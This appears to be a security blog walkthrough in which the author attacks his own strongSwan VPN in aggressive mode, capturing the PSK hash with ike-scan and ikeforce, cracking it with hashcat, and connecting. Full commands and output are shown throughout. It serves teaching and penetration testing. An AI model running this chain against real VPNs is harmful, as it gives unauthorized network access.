IKE Aggressive Mode VPN – ike-scan + ikeforce

As I’ve seen it on more than a few engagements, I wanted to show attacking IKE aggressive mode VPNs.

IKE Aggressive Mode – Introduction

First, I recommend looking at my previous post if you want to see how I setup this VPN initially.

I’ve obtained access to a few networks via this attack, and it’s always something worth checking.

For more examples, you can check out the SpiderLabs series on this attack as well.

Enabling Aggressive Mode

I had to enable aggressive mode on my VPN server before performing the attack.

First, I added the very specific charon rule to my strongswan.conf.

[email protected]:~# cat /etc/strongswan.conf 
# strongswan.conf - strongSwan configuration file
#
# Refer to the strongswan.conf(5) manpage for details
#
# Configuration changes should be made in the included files


charon {
    load_modular = yes
    plugins {
        include strongswan.d/charon/*.conf
    }
}


charon.i_dont_care_about_security_and_use_aggressive_mode_psk=yes


include strongswan.d/*.conf

Next, I added the PSK to my ipsec.secrets file.

[email protected]:~# cat /etc/ipsec.secrets 
# This file holds shared secrets or RSA private keys for authentication.


# RSA private key for this host, authenticating it to any other host
# which knows the public part.


: RSA "server-key.pem"
: PSK "passw0rd"

I also added a new connection in my ipsec.conf file, to support the PSK authentication.

[email protected]:~# cat /etc/ipsec.conf
config setup
    charondebug="ike 1, knl 1, cfg 0"
    uniqueids=no

conn ikev2-vpn
    auto=add
    compress=no
    type=tunnel
    keyexchange=ikev2
    fragmentation=yes
    forceencaps=yes

    ike=aes256-sha1-modp1024,aes128-sha1-modp1024,3des-sha1-modp1024! 
    esp=aes256-sha256,aes256-sha1,3des-sha1!

    dpdaction=clear
    dpdelay=300s
    rekey=no

    left=%any
    leftid=138.197.x.x
    leftcert=server-cert.pem
    leftsendcert=always
    leftsubnet=0.0.0.0/0

    right=%any
    rightid=%any
    rightauth=eap-mschapv2
    rightsourceip=10.10.10.0/24
    rightdns=8.8.8.8,8.8.4.4
    rightsendcert=never

    eap_identity=%identity

conn ipsec
    keyexchange=ikev1
    authby=xauthpsk
    xauth=server
    aggressive=yes
    left=%defaultroute
    leftsubnet=0.0.0.0/0
    leftfirewall=yes
    right=%any
    rightsourceip=10.10.10.0/24
    rightdns=8.8.8.8,8.8.4.4
    auto=add

As a fun note, strongSwan changes its name to ‘weakSwan’ when you enable aggressive mode.

[email protected]:~# service strongswan restart
[email protected]:~# service strongswan status
● strongswan.service - strongSwan IPsec IKEv1/IKEv2 daemon using ipsec.conf
   Loaded: loaded (/lib/systemd/system/strongswan.service; enabled; vendor preset: enabled)
   Active: active (running) since Mon 2019-05-13 00:51:07 UTC; 2s ago
 Main PID: 3773 (starter)
    Tasks: 18 (limit: 1146)
   Memory: 6.0M
   CGroup: /system.slice/strongswan.service
           ├─3773 /usr/lib/ipsec/starter --daemon charon --nofork
           └─3797 /usr/lib/ipsec/charon --debug-ike 1 --debug-knl 1 --debug-cfg 0


May 13 00:51:07 ubuntu-vpn systemd[1]: Started strongSwan IPsec IKEv1/IKEv2 daemon using ipsec.conf.
May 13 00:51:07 ubuntu-vpn ipsec[3773]: Starting weakSwan 5.7.1 IPsec [starter]...
May 13 00:51:07 ubuntu-vpn ipsec_starter[3773]: Starting weakSwan 5.7.1 IPsec [starter]...
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[DMN] Starting IKE charon daemon (strongSwan 5.7.1, Linux 5.0.0-13-generic, x86_64)
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[LIB] plugin 'load-tester': failed to load - load_tester_plugin_create returned NULL
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[LIB] loaded plugins: charon test-vectors unbound ldap pkcs11 tpm aesni aes rc2 sha2 sha1 md4 md5 mgf1 rdrand random nonce x509 revocation constraints acert pubkey pkcs1 pkcs7 pkcs8 pkcs12 pgp dn
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[LIB] dropped capabilities, running as uid 0, gid 0
May 13 00:51:07 ubuntu-vpn charon[3797]: 00[JOB] spawning 16 worker threads
May 13 00:51:07 ubuntu-vpn ipsec[3773]: charon (3797) started after 100 ms
May 13 00:51:07 ubuntu-vpn ipsec_starter[3773]: charon (3797) started after 100 ms

Fixing Connection Issues

Unfortunately, I was running into some NO_PROPOSAL_CHOSEN errors when I tried to connect.

This looked like the issues I had with the initial setup, so I added specific ike and esp proposals to my ipsec.conf file. I also removed the ikev2-vpn connection, as I would not be using it for this demonstration.

[email protected]:~# cat /etc/ipsec.conf
config setup
    charondebug="ike 1, knl 1, cfg 0"
    uniqueids=no

conn ipsec
    keyexchange=ikev1
    authby=xauthpsk
    aggressive=yes

    ike=aes256-sha1-modp1024,aes128-sha1-modp1024,3des-sha1-modp1024! 
    esp=aes256-sha256,aes256-sha1,3des-sha1!

    left=%any
    leftid=138.197.x.x
    leftsubnet=0.0.0.0/0
    leftfirewall=yes

    right=%any
    rightsourceip=10.10.10.0/24
    rightdns=8.8.8.8,8.8.4.4
    auto=add

The service restarted just fine, and my config changes seemed to work.

[email protected]:~# service strongswan restart
[email protected]:~# service strongswan status
● strongswan.service - strongSwan IPsec IKEv1/IKEv2 daemon using ipsec.conf
   Loaded: loaded (/lib/systemd/system/strongswan.service; enabled; vendor preset: enabled)
   Active: active (running) since Mon 2019-05-13 00:55:49 UTC; 9s ago
 Main PID: 3890 (starter)
    Tasks: 18 (limit: 1146)
   Memory: 6.0M
   CGroup: /system.slice/strongswan.service
           ├─3890 /usr/lib/ipsec/starter --daemon charon --nofork
           └─3914 /usr/lib/ipsec/charon --debug-ike 1 --debug-knl 1 --debug-cfg 0

IKE Aggressive Mode – Obtaining the Hash

First, I used ike-scan to verify that the target supported aggressive mode.

[email protected]:~/tools/ike-scan# sudo ike-scan -M -A 138.197.x.x --id=test --sport=5001
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
138.197.x.x Aggressive Mode Handshake returned
    HDR=(CKY-R=bd604ebe989abc87)
    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    KeyExchange(128 bytes)
    Nonce(32 bytes)
    ID(Type=ID_IPV4_ADDR, Value=138.197.x.x)
    VID=09002689dfd6b712 (XAUTH)
    VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
    Hash(20 bytes)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.119 seconds (8.39 hosts/sec).  1 returned handshake; 0 returned notify

Next, I ran ikeforce to try and obtain the group ID. Note that I received an invalid transform error from this attempt.

[email protected]:~/tools/ikeforce# sudo python ikeforce.py 138.197.x.x -e -w groupnames_shodan.txt --sport=5001
[+]Program started in Enumeration Mode
[+]Checking for possible enumeration techniques
Analyzing initial response. Please wait, this can take up to 15 seconds...
[-] Invalid Transform Set selected. Run the tool again with the -a flag to enumerate all accepted AM transform sets
Shutting down server

I reran ikeforce with the ‘-a’ flag to enumerate the accepted transforms.

[email protected]:~/tools/ikeforce# sudo python ikeforce.py 138.197.x.x -a --sport=5001
[+]Program started in Transform Set Enumeration Mode
[+]Checking for acceptable Transforms

============================================================================================
Accepted (AM) Transform Sets
============================================================================================
| 5 : 3DES-CBC | 2 : SHA | 1 : PSK | 2 : alternate 1024-bit MODP group |
--------------------------------------------------------------------------------------------
============================================================================================
Shutting down server

Finally, I ran ike-scan again, with the valid transformations, and an ID of ‘groupid’. Note that this normally requires a valid group ID to return a valid hash. That said, I was unable to set an actual group ID with strongSwan, so any ID would have returned a valid hash! This should have to do with the rightid parameter for ipsec.conf, but I couldn’t get it to work.

[email protected]:~/tools/ikeforce# sudo ike-scan 138.197.x.x -M -A --trans=5,2,1,2 --id=groupid --sport=5001 -Phash
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
138.197.x.x Aggressive Mode Handshake returned
    HDR=(CKY-R=8b67013d65acf933)
    SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    KeyExchange(128 bytes)
    Nonce(32 bytes)
    ID(Type=ID_IPV4_ADDR, Value=138.197.x.x)
    VID=09002689dfd6b712 (XAUTH)
    VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
    Hash(20 bytes)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.097 seconds (10.33 hosts/sec).  1 returned handshake; 0 returned notify
[email protected]:~/tools/ikeforce# cat hash 
8b657880ebb6a2554268c554a2683825f988a91c6b518f47376fb685da7df1377721d82bcdd3130dda9e6e8bc7422f440bc1cc8b2e8b1a25678c390e6da3024ce27ce1c4499663ac8d49ffc44c85dd075556b2b9c5ce7d8f974067020650479de058f60f220d16bd99226f483060941f5278384fcc5accf266c004e985ed06de:8133f3f6fa7a2b815065df68722a702c14ace7c1c1b7729887dae1f756763916950fc10437d990058de35ca83b8519de7e65eb3a59747aa7a53b36e209494db19ade19df70950b29f6d0c889e7aeba04410cdac12aa29a6810947c257614579491db0e5245746ca4da15d40b19e01e9d4fc0d942dd7f15b033316f1c39254c63:8b67013d65acf933:64cd9d94a862dadd:00000001000000010000002c01010001000000240101000080010005800200028003000180040002800b0001000c000400007080:010000008ac5ddda:85a15a301e9889dd116ca5d4a0ea35fed5c550ff:efe8f24573b2a8b7645c4ece0c323630430daa3e25e550504255d6efa4a7c087:464debaea25c7d6e20237317cbf33187a9d71e6c

Cracking the Hash

After obtaining the aggressive mode hash, I cracked it using hashcat mode 5400. As you can see, I successfully recovered the PSK of ‘passw0rd’.

[email protected]:~/tools/ikeforce# hashcat -d2,3 -m 5400 -r ~/tools/cracking/best64.rule hash ~/tools/cracking/rockyou.txt
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104517568
* Runtime...: 1 sec

8b657880ebb6a2554268c554a2683825f988a91c6b518f47376fb685da7df1377721d82bcdd3130dda9e6e8bc7422f440bc1cc8b2e8b1a25678c390e6da3024ce27ce1c4499663ac8d49ffc44c85dd075556b2b9c5ce7d8f974067020650479de058f60f220d16bd99226f483060941f5278384fcc5accf266c004e985ed06de:8133f3f6fa7a2b815065df68722a702c14ace7c1c1b7729887dae1f756763916950fc10437d990058de35ca83b8519de7e65eb3a59747aa7a53b36e209494db19ade19df70950b29f6d0c889e7aeba04410cdac12aa29a6810947c257614579491db0e5245746ca4da15d40b19e01e9d4fc0d942dd7f15b033316f1c39254c63:8b67013d65acf933:64cd9d94a862dadd:00000001000000010000002c01010001000000240101000080010005800200028003000180040002800b0001000c000400007080010000008ac5ddda:85a15a301e9889dd116ca5d4a0ea35fed5c550ff:efe8f24573b2a8b7645c4ece0c323630430daa3e25e550504255d6efa4a7c087:464debaea25c7d6e20237317cbf33187a9d71e6c:passw0rd
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: IKE-PSK SHA1
Hash.Target......: 8b657880ebb6a2554268c554a2683825f988a91c6b518f47376...d71e6c
Time.Started.....: Mon May 20 08:47:38 2019 (0 secs)
Time.Estimated...: Mon May 20 08:47:38 2019 (0 secs)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:   541.4 kH/s (7.74ms) @ Accel:1 Loops:1 Thr:256 Vec:1
Speed.Dev.#3.....:        0 H/s (0.00ms) @ Accel:16 Loops:2 Thr:256 Vec:1
Speed.Dev.#*.....:   541.4 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6144/1104517568 (0.00%)
Rejected.........: 0/6144 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Candidates.#2....: 123456 -> horoscope
Candidates.#3....: [Copying]

Started: Mon May 20 08:47:35 2019
Stopped: Mon May 20 08:47:39 2019

Connecting

With the cracked PSK in hand, it was time to connect to the server!

Unfortunately, I received a few errors, and was unable to intially connect.

First, I needed to update the xauth and authby parameters for my ipsec.conf file. Note that the ‘xauthby=alwaysok’ should allow me to authenticate with any XAUTH values, and only the PSK. That said, I was unable to get this to work in practice.

[email protected]:~# cat /etc/ipsec.conf
config setup
    protostack=netkey
    charondebug="ike 1, knl 1, cfg 0"
    uniqueids=no

conn ipsec
    keyexchange=ikev1
    authby=xauthpsk
    xauth=server
    xauthby=alwaysok
    aggressive=yes
    lifetime=10800s

    ike=aes256-sha1-modp1024,aes128-sha1-modp1024,3des-sha1-modp1024! 
    esp=aes256-sha256,aes256-sha1,3des-sha1!

    left=%any
    leftid=138.197.x.x
    leftsubnet=0.0.0.0/0
    leftfirewall=yes
    leftxauthserver=yes

    right=%any
    rightxauthclient=yes
    rightsourceip=10.10.10.0/24
    rightdns=8.8.8.8,8.8.4.4
    auto=add

For another example of this configuration, you can visit the following post.

With the changes in place, I was finally able to authenticate using charon. I did have to use valid credentials for the [email protected] account, and add them to my ipsec.secrets file.

[email protected]:~/ike# charon-cmd --host 138.197.x.x --identity [email protected] --profile ikev1-xauth-psk-am --ike-proposal aes256-sha1-modp1024 --esp-proposal aes256-sha256
00[LIB] dropped capabilities, running as uid 0, gid 0
00[DMN] Starting charon-cmd IKE client (strongSwan 5.8.0, Linux 5.2.0-kali2-amd64, x86_64)
00[LIB] loaded plugins: charon-cmd aesni aes rc2 sha2 sha1 md5 mgf1 random nonce x509 revocation constraints pubkey pkcs1 pkcs7 pkcs8 pkcs12 sshkey pem openssl fips-prf gmp agent xcbc hmac gcm kernel-netlink resolve socket-default bypass-lan eap-identity eap-md5 eap-gtc eap-mschapv2 eap-tls eap-ttls xauth-generic
00[JOB] spawning 16 worker threads
05[IKE] installed bypass policy for 172.16.8.0/24
06[IKE] initiating Aggressive Mode IKE_SA cmd[1] to 138.197.x.x
05[KNL] received netlink error: Invalid argument (22)
05[KNL] unable to install source route for %any6
05[IKE] installed bypass policy for ::1/128
05[IKE] installed bypass policy for fe80::/64
06[ENC] generating AGGRESSIVE request 0 [ SA KE No ID V V V V V ]
06[NET] sending packet: from 172.16.x.x[42802] to 138.197.x.x[4500] (371 bytes)
08[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[42802] (412 bytes)
08[ENC] parsed AGGRESSIVE response 0 [ SA KE No ID V V V V NAT-D NAT-D HASH ]
08[IKE] received XAuth vendor ID
08[IKE] received DPD vendor ID
08[IKE] received FRAGMENTATION vendor ID
08[IKE] received NAT-T (RFC 3947) vendor ID
08[CFG] selected proposal: IKE:AES_CBC_256/HMAC_SHA1_96/PRF_HMAC_SHA1/MODP_1024
Preshared Key: 
08[IKE] local host is behind NAT, sending keep alives
08[ENC] generating AGGRESSIVE request 0 [ HASH NAT-D NAT-D ]
08[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (108 bytes)
09[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[54409] (76 bytes)
09[ENC] parsed TRANSACTION request 3467891452 [ HASH CPRQ(X_USER X_PWD) ]
EAP password: 
09[ENC] generating TRANSACTION response 3467891452 [ HASH CPRP(X_USER X_PWD) ]
09[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (92 bytes)
10[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[54409] (76 bytes)
10[ENC] parsed TRANSACTION request 3167944879 [ HASH CPS(X_STATUS) ]
10[IKE] XAuth authentication of '[email protected]' (myself) successful
10[IKE] IKE_SA cmd[1] established between 172.16.x.x[[email protected]]...138.197.x.x[138.197.x.x]
10[IKE] scheduling rekeying in 35627s
10[IKE] maximum IKE_SA lifetime 36227s
10[ENC] generating TRANSACTION response 3167944879 [ HASH CPA(X_STATUS) ]
10[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (76 bytes)
10[ENC] generating TRANSACTION request 3232408269 [ HASH CPRQ(ADDR DNS) ]
10[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (76 bytes)
11[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[54409] (92 bytes)
11[ENC] parsed TRANSACTION response 3232408269 [ HASH CPRP(ADDR DNS DNS) ]
11[IKE] installing DNS server 8.8.8.8 to /etc/resolv.conf
11[IKE] installing DNS server 8.8.4.4 to /etc/resolv.conf
11[IKE] installing new virtual IP 10.10.10.1
11[ENC] generating QUICK_MODE request 2050222642 [ HASH SA No ID ID ]
11[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (172 bytes)
12[NET] received packet: from 138.197.x.x[4500] to 172.16.x.x[54409] (172 bytes)
12[ENC] parsed QUICK_MODE response 2050222642 [ HASH SA No ID ID ]
12[CFG] selected proposal: ESP:AES_CBC_256/HMAC_SHA2_256_128/NO_EXT_SEQ
12[IKE] CHILD_SA cmd{1} established with SPIs c3f6d869_i cfd35ad3_o and TS 10.10.10.1/32 === 0.0.0.0/0
12[ENC] generating QUICK_MODE request 2050222642 [ HASH ]
12[NET] sending packet: from 172.16.x.x[54409] to 138.197.x.x[4500] (60 bytes)

I validated that the VPN connection was working by pulling down an IP address from my attacking box.

[email protected]:~/ike# curl http://ipinfo.io/ip
138.197.x.x

IKE Aggressive Mode – Conclusion

While it took awhile to get this post out, I’m glad that I finally finished.

IKE aggressive mode is an often overlooked attack vector, but it can easily lead to an external compromise.

I’ll leave cracking XAUTH up to the reader for now, but maybe I’ll add a third blog post in this series eventually!

2 thoughts on “IKE Aggressive Mode VPN – ike-scan + ikeforce”

  1. Is there any tool similar to ikeforce? As I don’t think trustwave/spiderlabs are going to implement or upgrade it to a python3 version. Sadly nobody has forked this project yet..

    It really is the only ‘go to’ tool for proper vpn enumeration / research..
    In saying that, I do find

    https://github.com/isaudits/scripts/blob/master/iker.py

    is very useful for collecting preliminary info although it does’t help when trying to figure out the groupid :/

    1. I’ve only used ikeforce in the past, so I’m not sure offhand.

      Yea, iker is nice but doesn’t help for groupid fairly often. That said, just updating ikeforce to Python3 would likely be easy, I just haven’t looked into it.

      Unfortunately, I don’t know of any other tools offhand.

Leave a Comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.